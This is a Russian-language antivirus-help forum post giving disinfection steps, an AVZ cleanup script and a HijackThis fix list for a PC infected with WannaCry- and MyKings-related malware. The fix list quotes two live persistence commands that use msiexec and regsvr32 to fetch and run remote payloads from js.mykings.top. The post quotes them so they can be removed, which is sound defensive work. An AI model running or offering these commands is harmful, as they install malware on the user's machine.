Перейти к содержанию

Рекомендуемые сообщения

Здравствуйте!

1) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

 

2)

SpyHunter 4 [2017/05/12 22:45:00]-->C:\Users\Павел\AppData\Roaming\Enigma Software Group\sh_installer.exe -r sh

Удалите.


3)

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 SetServiceStart('mssecsvc2.0', 4);
 StopService('mssecsvc2.0');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
 DeleteService('SpyHunter 4 Service');
 DeleteService('mssecsvc2.0');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

4)  - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

 

5)  "Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O4 - HKLM\..\Run: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
O4 - HKLM\..\Run: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
O4 - HKU\S-1-5-18\..\RunOnce: [{80655FC2-A38F-4B8C-8775-9A3C68A6C305}] C:\Program Files (x86)\MSI\Live Update\LU5\DL_FILE\Killer_Network_Drivers_1.1.42.1045\Setup.exe /silent (file missing)
O4 - MSConfig\startupreg: [BNM Updater] C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\chp.exe cmd.exe /c ""C:\Users\Павел\AppData\Local\Beeline Network Manager\updater\bash-run.bat" "beeline-wizard-updater"" (file missing) (HKLM) (2014/09/13)
O4 - MSConfig\startupreg: [EPLTarget] (no file)  (2014/09/13)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - ShellIconOverlayIdentifiers: 00avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task (Ready): ParetoLogic Update Version3 - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe (file missing)
O22 - Task (Ready): ParetoLogic Update Version3 Startup Task - C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe -StartupTask (file missing)
O22 - Task (Ready): SafeZone scheduled Autoupdate 1468305763 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task (Ready): \AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (file missing)
O22 - Task (Ready): {485346E6-1024-41D8-A0CD-4CA331E36AE9} - C:\Users\Павел\Desktop\directx_Jun2010_redist.exe (file missing)
O22 - Task (Ready): {4AEA447C-98A5-44D0-9CA5-635AD6037838} - G:\Program Files (x86)\From Dust\Titanfall2\__Installer\vc\vc2010sp1\redist\vcredist_x64.exe (file missing)
O22 - Task (Ready): {76A32D2F-D274-4D1D-9B7C-5E3539B3A29E} - G:\Games\Dark Souls III\Game\DarkSoulsIII.exe (file missing)
 
5) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • От regist
      На форуме зарегистрировались мошенники, которые предлагают перевести им деньги, а взамен обещают выслать вам дешифратор.
      Не ведитесь на это. Это развод! Никакого дешифратора у них нет.
      Если вам предлагают купить дешифратор, то просьба сообщите об этом модератору.
    • От W32neshuta
      словил шифровальщик bitcoin@email.tg
      29.02.2020 файлы были зашифрованы.
      на комп заходили по RDP и Anydesk.
       
      pack.zip
      CollectionLog-2020.03.02-11.14.zip
    • От ВячеславККК
      похожая ерунда случилась. файлы зашифрованы с расширением id-222CC5A1.[cryptocash@aol.com].CASH
      есть какая то вероятность расшифровки? и какая нибудь утилита для проверки на предмет самого шифровальшика? где его искать если он ещё где то есть в системе


      Сообщение от модератора thyrex Перенесено из темы https://forum.kasperskyclub.ru/index.php?showtopic=63822
    • От RomiruS
      Здравствуйте.
      Уже более двух лет у меня на компьютере файлы, которые были зашифрованы вымогателем "wannacry"
      Всё бы ничего, я бы давно всё снес.. Но семейные фото - всё, что мне нужно восстановить (около 160 гигов).
      Вымогателя увидел после возвращения с работы (компьютер был включен).
      Есть эти же файлы в двух видах (зашифрованные и расшифрованные), прикрепить не знаю как, не разрешает( Есть ли вообще какая-то надежда, что в будущем появиться дешифратор? Или эти файлы пропали навсегда? 
      Спасибо за внимание! 
      Неуязвимости Вам)
    • От w3r3wolf
      Добрый день!
      На нашем сервере зашифрованы файлы при помощи: HEUR:Trojan-Ransom.Win32.Agent.gen
      Созданы файлы: [PedantBack@protonmail.com].pQPCtSzc-U0lAaLH8.PEDANT
      Информацию прикрепил с Farbar Recovery Scan Tool
      inform.zip
×
×
  • Создать...